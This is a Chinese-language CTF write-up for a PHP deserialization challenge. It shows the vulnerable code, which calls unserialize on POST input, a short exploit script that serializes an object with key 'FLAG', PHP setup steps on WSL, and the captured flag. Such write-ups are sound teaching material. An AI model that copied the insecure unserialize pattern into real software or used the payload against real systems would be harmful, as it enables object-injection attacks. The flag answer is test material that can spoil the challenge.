1 通過post參數提交反序列信息

2 題目

http://192.168.1.8/fxl1/fxl1.php

<?php
highlight_file(__FILE__);class ezUnserialize{public $key;public function __destruct(){if($this->key == "FLAG"){include('flag.php');echo $flag;}}
}
unserialize($_POST['a']);
?>

3 EXP

<?php
<?php
class ezUnserialize{public $key;public function __construct($a){$this->key = $a;}
}
$obj = new ezUnserialize("FLAG");
echo serialize($obj);
?>

4 解題過程

4.0.1 在wsl的ubuntu上安裝php環境

Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ond?ej Sury maintains up-to-date PHP packages for Ubuntu:sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 /var/www/html配置普通賬戶可讀可寫可執行權限

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-應用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.0.3 將題目代碼和flag存放到/var/www/html/相應的位置

4.1 在vscode上運行上面的exp的php腳本

需要安裝插件php debug 和php Server

4.2 vscode運行exp 的php腳本

4.3 通過hackbar的post功能提交

4.得到flag

flag{EzUns3ri4liZe_1s_g00d}